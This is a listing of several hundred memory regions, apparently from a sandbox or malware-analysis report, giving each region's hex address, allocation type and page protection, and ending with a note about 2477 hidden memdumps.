trusted library allocation
page read and write
7FE89A90000
trusted library allocation
page read and write
1C2F5000
heap
page read and write
10016000
direct allocation
page execute and read and write
7FE89AB0000
trusted library allocation
page read and write
7FE89BA0000
trusted library allocation
page read and write
341000
heap
page read and write
1ACC1000
heap
page read and write
7FE89B80000
trusted library allocation
page read and write
7FE898B3000
trusted library allocation
page read and write
E0000
heap
page read and write
1CDE8000
trusted library section
page read and write
4779000
heap
page read and write
1E70000
heap
page read and write
26D2000
trusted library allocation
page read and write
2B6000
heap
page read and write
439F000
heap
page read and write
49D1000
heap
page read and write
3C78000
heap
page read and write
316000
heap
page read and write
1CF9B000
trusted library section
page read and write
2FE7000
heap
page read and write
47ED000
heap
page read and write
46DB000
heap
page read and write
7FE89A53000
trusted library allocation
page read and write
1A3DD000
stack
page read and write
7FE89950000
trusted library allocation
page execute and read and write
32E1000
heap
page read and write
7FE89986000
trusted library allocation
page execute and read and write
1A7B0000
heap
page execute and read and write
360000
heap
page read and write
1D034000
trusted library section
page read and write
1C3D7000
heap
page read and write
7FE89A90000
trusted library allocation
page read and write
529000
heap
page read and write
23EA000
trusted library allocation
page read and write
1F06000
heap
page read and write
2A13000
trusted library allocation
page read and write
7FE89BC0000
trusted library allocation
page read and write
46C2000
heap
page read and write
261E000
trusted library allocation
page read and write
7FE898AD000
trusted library allocation
page execute and read and write
401000
heap
page read and write
2E1D000
stack
page read and write
546000
heap
page read and write
28C4000
trusted library allocation
page read and write
2ABB000
stack
page read and write
3A5D000
trusted library allocation
page read and write
1C36E000
heap
page read and write
470000
heap
page read and write
2681000
heap
page read and write
21E5000
trusted library allocation
page read and write
7FE89A52000
trusted library allocation
page read and write
7FE89C2C000
trusted library allocation
page read and write
2360000
heap
page read and write
233E000
stack
page read and write
425000
heap
page read and write
10000
heap
page read and write
23FE000
trusted library allocation
page read and write
7FE89BB0000
trusted library allocation
page read and write
3EF000
heap
page read and write
46C3000
heap
page read and write
206000
heap
page read and write
345000
heap
page read and write
1CE89000
trusted library section
page read and write
3157000
trusted library allocation
page read and write
480000
heap
page read and write
1C3F5000
heap
page read and write
1C8BB000
stack
page read and write
33A6000
heap
page read and write
1CFE7000
trusted library section
page read and write
47A3000
heap
page read and write
24C000
heap
page read and write
29D000
heap
page read and write
12CFD000
trusted library allocation
page read and write
3A5D000
trusted library allocation
page read and write
325B000
stack
page read and write
48A000
heap
page read and write
46DB000
heap
page read and write
4DC000
heap
page read and write
7FE89880000
trusted library allocation
page read and write
2D5000
stack
page read and write
366000
heap
page read and write
265F000
stack
page read and write
28C2000
trusted library allocation
page read and write
12E000
heap
page read and write
2DF000
heap
page read and write
1E43000
direct allocation
page read and write
3357000
heap
page read and write
C3E000
stack
page read and write
7FE898A0000
trusted library allocation
page read and write
34F000
heap
page read and write
521000
heap
page read and write
7FE89B90000
trusted library allocation
page read and write
1B2B4000
heap
page read and write
7FE898A0000
trusted library allocation
page read and write
12DED000
trusted library allocation
page read and write
24A5000
heap
page read and write
28A7000
trusted library allocation
page read and write
480000
heap
page read and write
23F3000
trusted library allocation
page read and write
7FE89AE0000
trusted library allocation
page read and write
4771000
heap
page read and write
13F000
heap
page read and write
2CDF000
stack
page read and write
1FE0000
remote allocation
page read and write
7FE89A5C000
trusted library allocation
page read and write
3007000
heap
page read and write
47C000
heap
page read and write
43A8000
heap
page read and write
1D84000
heap
page read and write
18A000
heap
page read and write
49AB000
heap
page read and write
46C0000
heap
page read and write
45A1000
heap
page read and write
190000
heap
page read and write
7FE89940000
trusted library allocation
page read and write
1E60000
heap
page read and write
380000
trusted library allocation
page read and write
180000
heap
page read and write
46DB000
heap
page read and write
1B0AE000
stack
page read and write
4771000
heap
page read and write
406E000
stack
page read and write
3724000
heap
page read and write
2F000
heap
page read and write
12F000
heap
page read and write
1A710000
heap
page execute and read and write
2FE6000
heap
page read and write
7FE89C11000
trusted library allocation
page read and write
2FD5000
heap
page read and write
4A63000
heap
page read and write
1C6AE000
stack
page read and write
1CA0000
direct allocation
page read and write
10000
heap
page read and write
7FE89B40000
trusted library allocation
page read and write
1C3EC000
heap
page read and write
47A1000
heap
page read and write
7FE8994C000
trusted library allocation
page execute and read and write
4778000
heap
page read and write
23F1000
trusted library allocation
page read and write
254000
heap
page read and write
2D5000
heap
page read and write
7FE899B0000
trusted library allocation
page execute and read and write
2129000
stack
page read and write
1CA7000
direct allocation
page read and write
14BED000
trusted library allocation
page read and write
4921000
heap
page read and write
1B130000
heap
page read and write
33D000
heap
page read and write
23EE000
trusted library allocation
page read and write
7FE89A90000
trusted library allocation
page read and write
7FE8994C000
trusted library allocation
page execute and read and write
7FE89B20000
trusted library allocation
page read and write
43A9000
heap
page read and write
1B160000
heap
page read and write
4532000
heap
page read and write
1CDBA000
trusted library section
page read and write
3A8F000
trusted library allocation
page read and write
4472000
heap
page read and write
1CCAC000
trusted library section
page read and write
730000
heap
page read and write
32E1000
heap
page read and write
470000
heap
page read and write
1AC5F000
stack
page read and write
1CE55000
trusted library section
page read and write
2E0000
heap
page read and write
DC000
stack
page read and write
1B15F000
stack
page read and write
1ABED000
heap
page read and write
1A724000
heap
page execute and read and write
7FE89A60000
trusted library allocation
page execute and read and write
2F1000
heap
page read and write
46C000
heap
page read and write
3A7D000
trusted library allocation
page read and write
23FA000
trusted library allocation
page read and write
47EE000
heap
page read and write
1BFEF000
stack
page read and write
2769000
trusted library allocation
page read and write
1EB4000
heap
page read and write
2AE000
heap
page read and write
1D30000
trusted library allocation
page read and write
2100000
heap
page read and write
100000
heap
page read and write
2C1000
heap
page read and write
4B3000
heap
page read and write
1DF0000
direct allocation
page read and write
3530000
trusted library allocation
page read and write
1B350000
heap
page read and write
27D8000
heap
page read and write
4D2000
heap
page read and write
125F1000
trusted library allocation
page read and write
354000
heap
page read and write
2EBF000
stack
page read and write
45D000
system
page execute and read and write
179000
heap
page read and write
4A67000
heap
page read and write
570000
heap
page read and write
3A5D000
trusted library allocation
page read and write
2530000
trusted library allocation
page read and write
3A7D000
trusted library allocation
page read and write
1CFC7000
trusted library section
page read and write
1C55D000
stack
page read and write
3F8D000
heap
page read and write
2F3000
heap
page read and write
7FE89B70000
trusted library allocation
page read and write
1B4FF000
stack
page read and write
1AEBE000
stack
page read and write
2300000
trusted library allocation
page execute read
1A55F000
stack
page read and write
4400000
heap
page read and write
2B4000
heap
page read and write
2F4E000
stack
page read and write
119000
heap
page read and write
1C92D000
stack
page read and write
1A988000
stack
page read and write
1CFE9000
trusted library section
page read and write
1CE9D000
trusted library section
page read and write
1D008000
trusted library section
page read and write
250F000
stack
page read and write
2883000
trusted library allocation
page read and write
441B000
heap
page read and write
3D0000
heap
page read and write
441C000
heap
page read and write
344000
heap
page read and write
180000
heap
page read and write
2883000
trusted library allocation
page read and write
1D056000
trusted library section
page read and write
7FE89AD0000
trusted library allocation
page read and write
27C2000
trusted library allocation
page read and write
278A000
trusted library allocation
page read and write
1DF0000
direct allocation
page read and write
2C70000
heap
page read and write
1C45B000
heap
page read and write
3A7D000
trusted library allocation
page read and write
1AA90000
heap
page read and write
26F000
trusted library allocation
page read and write
3A5D000
trusted library allocation
page read and write
34F000
heap
page read and write
CB0000
heap
page read and write
2790000
trusted library allocation
page read and write
278000
heap
page read and write
7FE89894000
trusted library allocation
page read and write
2797000
trusted library allocation
page read and write
1A830000
heap
page execute and read and write
4714000
heap
page read and write
21AF000
stack
page read and write
2AD000
heap
page read and write
29D000
heap
page read and write
1CE29000
trusted library section
page read and write
21F5000
trusted library allocation
page read and write
50B000
heap
page read and write
1CCB2000
trusted library section
page read and write
4C0000
heap
page read and write
7FE89976000
trusted library allocation
page execute and read and write
7FE898A0000
trusted library allocation
page read and write
7FE8995C000
trusted library allocation
page execute and read and write
122000
heap
page read and write
3B6000
heap
page read and write
47A3000
heap
page read and write
54E000
heap
page read and write
1CDCB000
trusted library section
page read and write
334000
heap
page read and write
3A8F000
trusted library allocation
page read and write
442F000
heap
page read and write
35E000
heap
page read and write
3302000
heap
page read and write
3A89000
trusted library allocation
page read and write
3260000
trusted library allocation
page read and write
4919000
heap
page read and write
1AF9B000
stack
page read and write
17E000
heap
page read and write
3F4000
heap
page read and write
470000
heap
page read and write
7FE899B0000
trusted library allocation
page execute and read and write
1B46F000
stack
page read and write
2A19000
trusted library allocation
page read and write
351000
heap
page read and write
276B000
trusted library allocation
page read and write
145000
heap
page read and write
2FD8000
heap
page read and write
42C0000
heap
page read and write
1C2F0000
heap
page read and write
21F2000
trusted library allocation
page read and write
192000
stack
page read and write
556000
heap
page read and write
14B000
heap
page read and write
2D8000
heap
page read and write
1CC20000
trusted library section
page read and write
1DC0000
heap
page read and write
1A5FF000
stack
page read and write
336A000
heap
page read and write
1C66E000
stack
page read and write
7FE899C0000
trusted library allocation
page execute and read and write
138000
heap
page read and write
7FE89B00000
trusted library allocation
page read and write
4348000
heap
page read and write
124DF000
trusted library allocation
page read and write
416A000
heap
page read and write
1AD22000
heap
page read and write
1CEDC000
trusted library section
page read and write
4830000
heap
page read and write
2BC000
heap
page read and write
3A7D000
trusted library allocation
page read and write
7FE89B70000
trusted library allocation
page read and write
3310000
trusted library allocation
page read and write
278F000
stack
page read and write
37BE000
stack
page read and write
393F000
stack
page read and write
1CDEA000
trusted library section
page read and write
21EA000
trusted library allocation
page read and write
2D8000
heap
page read and write
13307000
trusted library allocation
page read and write
1A92E000
stack
page read and write
1ACCB000
heap
page read and write
3B69000
trusted library allocation
page read and write
1CE35000
trusted library section
page read and write
2B4000
heap
page read and write
336C000
heap
page read and write
453C000
heap
page read and write
10000
heap
page read and write
46DC000
heap
page read and write
320000
heap
page read and write
1D018000
trusted library section
page read and write
1C340000
heap
page read and write
2F95000
heap
page read and write
4102000
heap
page read and write
316000
heap
page read and write
1251D000
trusted library allocation
page read and write
1CE0A000
trusted library section
page read and write
1CE7F000
trusted library section
page read and write
1EB0000
heap
page read and write
258C000
stack
page read and write
7FE89AA0000
trusted library allocation
page read and write
453E000
heap
page read and write
17C000
heap
page read and write
21F2000
trusted library allocation
page read and write
336A000
heap
page read and write
5A5000
heap
page read and write
1B530000
heap
page read and write
2B5E000
stack
page read and write
1AAB4000
heap
page read and write
1E10000
direct allocation
page read and write
278E000
trusted library allocation
page read and write
522000
heap
page read and write
4CE000
heap
page read and write
2D5000
heap
page read and write
24F7000
trusted library allocation
page read and write
1CFB000
direct allocation
page read and write
23EA000
trusted library allocation
page read and write
36E6000
heap
page read and write
344000
heap
page read and write
122000
heap
page read and write
179000
heap
page read and write
2F95000
heap
page read and write
1DD4000
heap
page read and write
29D000
heap
page read and write
3A5D000
trusted library allocation
page read and write
1C2FA000
heap
page read and write
477F000
heap
page read and write
482F000
heap
page read and write
3315000
heap
page read and write
152000
heap
page read and write
2005000
heap
page read and write
1B2BE000
stack
page read and write
336B000
heap
page read and write
299000
heap
page read and write
49D000
heap
page read and write
7FE89B50000
trusted library allocation
page read and write
1E79000
stack
page read and write
7FE89930000
trusted library allocation
page execute and read and write
1B79E000
stack
page read and write
276D000
trusted library allocation
page read and write
2E8000
heap
page read and write
8A9000
heap
page read and write
7FE89A57000
trusted library allocation
page read and write
278E000
trusted library allocation
page read and write
23B0000
heap
page read and write
23EF000
trusted library allocation
page read and write
1E2F000
stack
page read and write
4168000
heap
page read and write
3A5D000
trusted library allocation
page read and write
7FE898AB000
trusted library allocation
page read and write
2D5000
heap
page read and write
1C176000
heap
page read and write
36000
heap
page read and write
333C000
heap
page read and write
14E000
heap
page read and write
755000
heap
page read and write
3A5D000
trusted library allocation
page read and write
249000
heap
page read and write
2C0000
heap
page read and write
1CF10000
trusted library section
page read and write
20DF000
stack
page read and write
3D4000
heap
page read and write
91A000
heap
page read and write
4058000
heap
page read and write
4778000
heap
page read and write
25B000
heap
page read and write
4A63000
heap
page read and write
2C0000
heap
page read and write
1CD64000
trusted library section
page read and write
1AD5C000
stack
page read and write
1DE0000
heap
page read and write
36FF000
stack
page read and write
274A000
stack
page read and write
480000
heap
page read and write
517000
heap
page read and write
1C141000
heap
page read and write
2F95000
heap
page read and write
518000
heap
page read and write
82A000
heap
page read and write
21EE000
trusted library allocation
page read and write
2DD000
heap
page read and write
338E000
heap
page read and write
19D000
heap
page read and write
2FE4000
heap
page read and write
4058000
heap
page read and write
400000
system
page execute and read and write
36DA000
heap
page read and write
439F000
heap
page read and write
119000
heap
page read and write
7FE89926000
trusted library allocation
page read and write
474000
heap
page read and write
1A230000
heap
page read and write
43AB000
heap
page read and write
7FE89A47000
trusted library allocation
page read and write
7FE89A12000
trusted library allocation
page read and write
38A6000
trusted library allocation
page read and write
460000
heap
page read and write
1B60C000
stack
page read and write
24F2000
trusted library allocation
page read and write
3B30000
heap
page read and write
10001000
direct allocation
page execute and read and write
5E0000
heap
page read and write
7FE89894000
trusted library allocation
page read and write
33C000
heap
page read and write
1A8EA000
stack
page read and write
367000
heap
page read and write
464000
heap
page read and write
26F000
trusted library allocation
page read and write
3BE000
heap
page read and write
32F4000
heap
page read and write
1CCBA000
trusted library section
page read and write
1AD0F000
heap
page read and write
4C40000
heap
page read and write
7FE89AE0000
trusted library allocation
page read and write
276E000
trusted library allocation
page read and write
1CD42000
trusted library section
page read and write
32D5000
heap
page read and write
2FDC000
heap
page read and write
1C32B000
heap
page read and write
20000
heap
page read and write
1A74F000
stack
page read and write
7FE89BE0000
trusted library allocation
page read and write
32E1000
heap
page read and write
43EF000
heap
page read and write
33A6000
heap
page read and write
25AF000
stack
page read and write
1AC65000
heap
page read and write
1A6DA000
heap
page read and write
313000
heap
page read and write
474000
remote allocation
page execute and read and write
36EA000
heap
page read and write
1AC8B000
heap
page read and write
7FE89A57000
trusted library allocation
page read and write
3A5D000
trusted library allocation
page read and write
3FF000
trusted library allocation
page read and write
1B21E000
stack
page read and write
1ABD0000
heap
page read and write
7FE89A94000
trusted library allocation
page read and write
24CF000
stack
page read and write
1E80000
heap
page execute and read and write
3A4000
heap
page read and write
4401000
heap
page read and write
2C6000
heap
page read and write
124D1000
trusted library allocation
page read and write
3574000
heap
page read and write
49D8000
heap
page read and write
1B23B000
stack
page read and write
3A7D000
trusted library allocation
page read and write
2AD000
heap
page read and write
482F000
heap
page read and write
1B324000
heap
page read and write
3F70000
heap
page read and write
4A6A000
heap
page read and write
2896000
trusted library allocation
page read and write
3357000
heap
page read and write
3F0000
trusted library allocation
page read and write
33A1000
heap
page read and write
441B000
heap
page read and write
12AEF000
trusted library allocation
page read and write
2DC000
heap
page read and write
47A1000
heap
page read and write
368E000
stack
page read and write
252C000
trusted library allocation
page read and write
7FE89A42000
trusted library allocation
page read and write
4A63000
heap
page read and write
1A86E000
heap
page execute and read and write
127000
heap
page read and write
400000
system
page execute and read and write
1C7C3000
heap
page read and write
3357000
heap
page read and write
4A3B000
heap
page read and write
314F000
trusted library allocation
page read and write
476B000
heap
page read and write
7FE89A50000
trusted library allocation
page execute and read and write
1A714000
heap
page execute and read and write
106000
heap
page read and write
517000
heap
page read and write
7FE89A94000
trusted library allocation
page read and write
1B63E000
stack
page read and write
1CDFE000
trusted library section
page read and write
33A6000
heap
page read and write
12A000
heap
page read and write
3A7D000
trusted library allocation
page read and write
2F1C000
heap
page read and write
3315000
heap
page read and write
330000
heap
page read and write
33F000
heap
page read and write
4166000
heap
page read and write
32D4000
heap
page read and write
10000
heap
page read and write
476E000
heap
page read and write
1CCB8000
trusted library section
page read and write
1A90F000
stack
page read and write
1CFE3000
trusted library section
page read and write
1D00E000
trusted library section
page read and write
3007000
heap
page read and write
7FE89AC0000
trusted library allocation
page read and write
1CE0E000
trusted library section
page read and write
7FE8989D000
trusted library allocation
page execute and read and write
3524000
heap
page read and write
4F7000
heap
page read and write
1CD66000
trusted library section
page read and write
279D000
trusted library allocation
page read and write
2F10000
heap
page read and write
2D5000
heap
page read and write
3CA1000
heap
page read and write
7FE89AD0000
trusted library allocation
page read and write
3060000
trusted library allocation
page read and write
1C3A9000
heap
page read and write
173000
heap
page read and write
1C2AD000
stack
page read and write
3A5D000
trusted library allocation
page read and write
2CA000
heap
page read and write
441B000
heap
page read and write
1C660000
heap
page read and write
2207000
trusted library allocation
page read and write
346D000
stack
page read and write
7FE89AF0000
trusted library allocation
page read and write
35D0000
trusted library allocation
page read and write
2AD000
heap
page read and write
305E000
stack
page read and write
409000
heap
page read and write
7FE899C0000
trusted library allocation
page execute and read and write
21F2000
trusted library allocation
page read and write
21ED000
trusted library allocation
page read and write
1AEEE000
stack
page read and write
1BD6000
heap
page read and write
1CF0C000
trusted library section
page read and write
23EA000
trusted library allocation
page read and write
574000
heap
page read and write
3B70000
trusted library allocation
page read and write
2D60000
trusted library allocation
page read and write
1CD31000
trusted library section
page read and write
124E1000
trusted library allocation
page read and write
2B0000
heap
page read and write
7FE89940000
trusted library allocation
page read and write
1CE8D000
trusted library section
page read and write
3CD0000
trusted library allocation
page read and write
1CEAE000
trusted library section
page read and write
1B1FF000
stack
page read and write
4751000
heap
page read and write
2FFE000
heap
page read and write
4776000
heap
page read and write
3E8000
stack
page read and write
1AFC0000
heap
page read and write
1CE25000
trusted library section
page read and write
15C000
stack
page read and write
1CE93000
trusted library section
page read and write
2911000
trusted library allocation
page read and write
4AC000
heap
page read and write
41B000
heap
page read and write
7FE89B70000
trusted library allocation
page read and write
2DF000
heap
page read and write
1A6DC000
heap
page read and write
47A5000
heap
page read and write
4621000
heap
page read and write
1CF34000
trusted library section
page read and write
32D5000
heap
page read and write
232000
heap
page read and write
7FE89BE0000
trusted library allocation
page read and write
22F6000
trusted library allocation
page read and write
143000
stack
page read and write
21F2000
trusted library allocation
page read and write
3407000
direct allocation
page read and write
149000
heap
page read and write
231000
heap
page read and write
7FE89BD0000
trusted library allocation
page read and write
453A000
heap
page read and write
7FE89A43000
trusted library allocation
page read and write
1CE08000
trusted library section
page read and write
7FE89976000
trusted library allocation
page execute and read and write
13F000
heap
page read and write
378000
heap
page read and write
3A5D000
trusted library allocation
page read and write
3A89000
trusted library allocation
page read and write
7FE89BF0000
trusted library allocation
page read and write
1B2F6000
heap
page read and write
4714000
heap
page read and write
3A7D000
trusted library allocation
page read and write
7FE89BB0000
trusted library allocation
page read and write
20000
heap
page read and write
1A6CF000
stack
page read and write
46B000
heap
page read and write
7FE89BA0000
trusted library allocation
page read and write
3357000
heap
page read and write
2900000
trusted library allocation
page read and write
2AB000
heap
page read and write
241E000
heap
page read and write
350000
heap
page read and write
297F000
trusted library allocation
page read and write
17C000
heap
page read and write
47F000
heap
page read and write
1AB4E000
heap
page read and write
1B2DB000
stack
page read and write
2291000
trusted library allocation
page read and write
310000
heap
page read and write
3A89000
trusted library allocation
page read and write
7FE89986000
trusted library allocation
page execute and read and write
7FE89A4C000
trusted library allocation
page read and write
25C1000
trusted library allocation
page read and write
210000
trusted library allocation
page read and write
4160000
heap
page read and write
3A7D000
trusted library allocation
page read and write
356000
heap
page read and write
436000
heap
page read and write
520000
heap
page read and write
509000
heap
page read and write
19E000
heap
page read and write
442F000
heap
page read and write
336A000
heap
page read and write
1A838000
heap
page execute and read and write
3CC000
heap
page read and write
33AB000
heap
page read and write
2FFC000
heap
page read and write
7FE89AC0000
trusted library allocation
page read and write
282000
stack
page read and write
3A7D000
trusted library allocation
page read and write
7FE89B40000
trusted library allocation
page read and write
482F000
heap
page read and write
21E1000
trusted library allocation
page read and write
5ED000
heap
page read and write
4142000
heap
page read and write
478000
remote allocation
page execute and read and write
416A000
heap
page read and write
3D4000
heap
page read and write
1E0000
heap
page read and write
4778000
heap
page read and write
1B1EF000
stack
page read and write
33E0000
direct allocation
page read and write
152000
heap
page read and write
25DD000
stack
page read and write
254D000
trusted library allocation
page read and write
2512000
trusted library allocation
page read and write
1ACFD000
stack
page read and write
1C426000
heap
page read and write
260000
trusted library allocation
page read and write
4B2000
heap
page read and write
4408000
heap
page read and write
1CCCF000
trusted library section
page read and write
1C19A000
heap
page read and write
1CD88000
trusted library section
page read and write
36DA000
heap
page read and write
7FE8988B000
trusted library allocation
page read and write
129CE000
trusted library allocation
page read and write
1C12F000
stack
page read and write
57A000
heap
page read and write
32E1000
heap
page read and write
1B640000
heap
page read and write
3407000
direct allocation
page read and write
4660000
heap
page read and write
2B4000
heap
page read and write
C70000
heap
page read and write
433000
heap
page read and write
27D0000
trusted library allocation
page read and write
1DAD000
stack
page read and write
4E7000
heap
page read and write
189000
heap
page read and write
3E9000
heap
page read and write
253F000
stack
page read and write
23F000
heap
page read and write
3A89000
trusted library allocation
page read and write
36E000
heap
page read and write
1FE0000
remote allocation
page read and write
7FE89C70000
trusted library allocation
page read and write
7FE89C24000
trusted library allocation
page read and write
18A000
heap
page read and write
7FE89B50000
trusted library allocation
page read and write
25F000
heap
page read and write
250000
heap
page read and write
1E30000
direct allocation
page read and write
20F000
heap
page read and write
7F7000
heap
page read and write
181000
heap
page read and write
7FE89BB0000
trusted library allocation
page read and write
1CE02000
trusted library section
page read and write
7FE89C4C000
trusted library allocation
page read and write
2750000
remote allocation
page read and write
7FE89A82000
trusted library allocation
page read and write
4A67000
heap
page read and write
125CF000
trusted library allocation
page read and write
14F000
heap
page read and write
145000
heap
page read and write
3357000
heap
page read and write
3315000
heap
page read and write
1A7B4000
heap
page execute and read and write
1CEE2000
trusted library section
page read and write
43A1000
heap
page read and write
7FE89A72000
trusted library allocation
page read and write
770000
heap
page read and write
1A834000
heap
page execute and read and write
1C12E000
stack
page read and write
1B05E000
stack
page read and write
23E000
heap
page read and write
2330000
heap
page read and write
47A5000
heap
page read and write
1D060000
trusted library section
page read and write
7FE89B50000
trusted library allocation
page read and write
1C673000
heap
page read and write
442F000
heap
page read and write
7FE89B80000
trusted library allocation
page read and write
7E2000
heap
page read and write
3A7D000
trusted library allocation
page read and write
21E3000
trusted library allocation
page read and write
41C000
heap
page read and write
3A5D000
trusted library allocation
page read and write
23E8000
trusted library allocation
page read and write
2AD0000
trusted library allocation
page read and write
1B1B0000
heap
page read and write
1A81E000
stack
page read and write
4771000
heap
page read and write
43A8000
heap
page read and write
4340000
heap
page read and write
3CAF000
stack
page read and write
7FE89BF0000
trusted library allocation
page read and write
3B7D000
stack
page read and write
1CBD000
direct allocation
page read and write
1AB5B000
heap
page read and write
1CCB6000
trusted library section
page read and write
3CE000
heap
page read and write
150000
trusted library allocation
page read and write
2767000
trusted library allocation
page read and write
1B18B000
stack
page read and write
259000
heap
page read and write
20000
heap
page read and write
287000
heap
page read and write
7FE89A10000
trusted library allocation
page read and write
1CFED000
trusted library section
page read and write
476E000
heap
page read and write
1CC0000
direct allocation
page read and write
4A6A000
heap
page read and write
4A65000
heap
page read and write
2BF0000
trusted library allocation
page read and write
1D80000
heap
page read and write
805000
heap
page read and write
113000
heap
page read and write
4ED000
heap
page read and write
5A7000
heap
page read and write
3A7D000
trusted library allocation
page read and write
4EC9000
heap
page read and write
1B11E000
stack
page read and write
439B000
heap
page read and write
4401000
heap
page read and write
3B31000
heap
page read and write
7FE89B20000
trusted library allocation
page read and write
121B1000
trusted library allocation
page read and write
1CF7A000
trusted library section
page read and write
3A8E000
stack
page read and write
7FE89B40000
trusted library allocation
page read and write
41E000
heap
page read and write
18C000
heap
page read and write
2D0000
heap
page read and write
453E000
heap
page read and write
7FE89A2C000
trusted library allocation
page read and write
11F000
heap
page read and write
299C000
stack
page read and write
273F000
trusted library allocation
page read and write
7FE89BD0000
trusted library allocation
page read and write
7FE89AE0000
trusted library allocation
page read and write
1A82E000
stack
page read and write
7FE8989D000
trusted library allocation
page execute and read and write
7FE89BF4000
trusted library allocation
page read and write
41B000
system
page execute and read and write
7FE8987D000
trusted library allocation
page execute and read and write
4C49000
heap
page read and write
27D3000
trusted library allocation
page read and write
7FE89BD0000
trusted library allocation
page read and write
1C95F000
stack
page read and write
255F000
trusted library allocation
page read and write
4A3E000
heap
page read and write
338E000
heap
page read and write
1B7AE000
stack
page read and write
3DE000
stack
page read and write
1D0000
trusted library allocation
page read and write
23B4000
heap
page read and write
1A718000
heap
page execute and read and write
388C000
stack
page read and write
45C000
system
page execute and read and write
1AC92000
heap
page read and write
D6E000
stack
page read and write
1C439000
heap
page read and write
4A40000
heap
page read and write
2986000
trusted library allocation
page read and write
480F000
heap
page read and write
7FE89BC0000
trusted library allocation
page read and write
439B000
heap
page read and write
3A7D000
trusted library allocation
page read and write
2761000
trusted library allocation
page read and write
2B4000
heap
page read and write
7FE898A2000
trusted library allocation
page read and write
360000
heap
page read and write
49D7000
heap
page read and write
24C000
heap
page read and write
7FE89AD0000
trusted library allocation
page read and write
249000
heap
page read and write
7FE898A4000
trusted library allocation
page read and write
7FE89B00000
trusted library allocation
page read and write
3302000
heap
page read and write
1A728000
heap
page execute and read and write
241A000
heap
page read and write
3DAF000
stack
page read and write
4B0000
heap
page read and write
203B000
heap
page read and write
1CFF000
direct allocation
page read and write
49D3000
heap
page read and write
3F0000
trusted library allocation
page read and write
7FE89BE0000
trusted library allocation
page read and write
444000
heap
page read and write
565000
heap
page read and write
1B320000
heap
page read and write
3A8F000
trusted library allocation
page read and write
7FE89A80000
trusted library allocation
page execute and read and write
1CF47000
trusted library section
page read and write
1D60000
direct allocation
page read and write
29BE000
stack
page read and write
7FE898AB000
trusted library allocation
page read and write
1A998000
stack
page read and write
619000
heap
page read and write
1B18F000
stack
page read and write
7FE89AD0000
trusted library allocation
page read and write
1CE10000
trusted library section
page read and write
1A680000
heap
page read and write
1C700000
heap
page read and write
1CCB4000
trusted library section
page read and write
476E000
heap
page read and write
46DB000
heap
page read and write
2B4000
heap
page read and write
3400000
direct allocation
page read and write
2772000
trusted library allocation
page read and write
4830000
heap
page read and write
7FE89BB0000
trusted library allocation
page read and write
4401000
heap
page read and write
1CEEA000
trusted library section
page read and write
276B000
trusted library allocation
page read and write
47A5000
heap
page read and write
441B000
heap
page read and write
1CFBD000
trusted library section
page read and write
3CD0000
trusted library allocation
page read and write
4751000
heap
page read and write
3A5D000
trusted library allocation
page read and write
4D3000
heap
page read and write
43AB000
heap
page read and write
1F10000
direct allocation
page read and write
18C000
heap
page read and write
2688000
heap
page read and write
47A1000
heap
page read and write
13D000
heap
page read and write
2788000
trusted library allocation
page read and write
1CF0E000
trusted library section
page read and write
55B000
heap
page read and write
2B0000
heap
page read and write
54F000
heap
page read and write
3A8F000
trusted library allocation
page read and write
4B8000
heap
page read and write
4771000
heap
page read and write
46DB000
heap
page read and write
7FE89AA4000
trusted library allocation
page read and write
7FE89AB0000
trusted library allocation
page read and write
4747000
heap
page read and write
4618000
heap
page read and write
2775000
trusted library allocation
page read and write
3A5D000
trusted library allocation
page read and write
247E000
stack
page read and write
1A77D000
heap
page read and write
21E9000
trusted library allocation
page read and write
159000
heap
page read and write
2AD000
heap
page read and write
342000
heap
page read and write
44C3000
heap
page read and write
2170000
heap
page execute and read and write
1CD8A000
trusted library section
page read and write
152000
heap
page read and write
476E000
heap
page read and write
2F30000
trusted library allocation
page read and write
7F0000
heap
page read and write
2FE7000
heap
page read and write
116000
heap
page read and write
46DC000
heap
page read and write
4E7000
heap
page read and write
49D7000
heap
page read and write
1D010000
trusted library section
page read and write
1D40000
heap
page execute and read and write
104000
heap
page read and write
350000
trusted library allocation
page read and write
4CA000
heap
page read and write
1B420000
heap
page read and write
25B000
heap
page read and write
34AD000
trusted library allocation
page read and write
1ED0000
heap
page read and write
1CE00000
trusted library section
page read and write
2D80000
trusted library allocation
page read and write
3A89000
trusted library allocation
page read and write
3413000
direct allocation
page read and write
3A7D000
trusted library allocation
page read and write
446F000
heap
page read and write
1C20000
heap
page read and write
2788000
trusted library allocation
page read and write
There are 2477 hidden memdumps, click here to show them.